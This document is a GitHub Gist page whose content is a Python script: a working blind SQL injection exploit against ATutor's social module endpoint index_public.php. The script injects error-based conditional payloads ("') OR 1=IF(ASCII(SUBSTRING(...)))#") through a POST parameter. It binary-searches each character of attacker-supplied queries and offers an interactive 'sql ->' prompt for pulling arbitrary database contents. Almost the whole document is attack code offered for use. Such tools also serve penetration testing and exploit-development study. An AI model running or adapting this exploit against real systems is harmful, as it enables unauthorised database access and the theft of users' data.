Created
January 11, 2020 14:14
-
-
Save DrMeosch/d62f4c111689bcf01eb06036ec16c896 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.7 | |
| # *-* coding: utf-8 *-* | |
| from requests.exceptions import HTTPError, Timeout | |
| from urllib.parse import quote, quote_plus | |
| from time import perf_counter | |
| from cmd import Cmd | |
| import requests | |
| import sys | |
| import re | |
| requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
| proxies = {'http':'http://127.0.0.1:8080', | |
| 'https':'http://127.0.0.1:8080'} | |
| url = 'http://atutor/ATutor/mods/_standard/social/index_public.php' | |
| method = "POST" | |
| delay = 1*3 # 10sec | |
| params = "rand_key=123&myFriendsOnly=1&search_friends_123=off" | |
| comment = "#" | |
| # check_str = False | |
| check_str = "Invalid argument supplied" # For error based injection | |
| # we treat it like positive answer from mysql server | |
| def make_request(s, p): | |
| """Make request to the target url and measure the delay""" | |
| # Hackaround to bypass params url-encoding cuz we handle it on our own | |
| # https://stackoverflow.com/questions/23496750/how-to-prevent-python-requests-from-percent-encoding-my-urls | |
| # payload_str = "&".join("%s=%s" % (k,v) for k,v in p.items()) | |
| p = prepare_statement(p) | |
| p = params + quote(p) | |
| t1 = perf_counter() | |
| if method == "GET": | |
| r = s.get(url + "?" + p) | |
| else: | |
| s.headers = {'Content-Type': 'application/x-www-form-urlencoded'} | |
| r = s.post(url, p) | |
| t2 = perf_counter() | |
| if (r.status_code == 200): | |
| if(check_str is False): | |
| # Time-based sqli here | |
| if (t2 - t1) > delay: | |
| return True | |
| else: | |
| if re.search(check_str, r.text, re.I): | |
| return True | |
| def prepare_statement(str1): | |
| """Prepare sql statement, replace spaces and escape strings if needed""" | |
| str1 = str1.replace(" ", "/**/") | |
| # str1 = str1.replace('\'', '$$') | |
| return str1 | |
| def get_string(s, s_sql, counter): | |
| a = 32 | |
| b = 125 | |
| while 1: | |
| # print (a, b) | |
| if (b - a < 0): | |
| break | |
| elif (b - a < 6): | |
| # here = statement | |
| # if fount break, else return | |
| str1 = "') OR 1=IF(ASCII(SUBSTRING((%s),%d,1))=%d,(SELECT 1 UNION SELECT 2),1)#" % (s_sql, counter, a) | |
| r = make_request(s, str1) | |
| if r: | |
| sys.stdout.write(chr(a)) | |
| sys.stdout.flush() | |
| get_string(s, s_sql, (counter+1)) | |
| break | |
| else: | |
| a += 1 | |
| else: | |
| c = (b - a) // 2 | |
| str1 = "') OR 1=IF(ASCII(SUBSTRING((%s),%d,1))>%d,(SELECT 1 UNION SELECT 2),1)#" % (s_sql, counter, a + c) | |
| r = make_request(s, str1) | |
| if r: | |
| a = a + c | |
| else: | |
| b = a + c | |
| class Terminal(Cmd): | |
| prompt = "sql -> " | |
| def default(self, args): | |
| if len(args) > 2: | |
| # print (len(args)) | |
| s = requests.Session() | |
| s.verify = False | |
| s.proxies = proxies | |
| r = get_string(s, args, 1) | |
| # print(r) | |
| sys.stdout.write("\n") | |
| sys.stdout.flush() | |
| else: | |
| print(' ') | |
| if __name__ == "__main__": | |
| term = Terminal() | |
| term.cmdloop() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment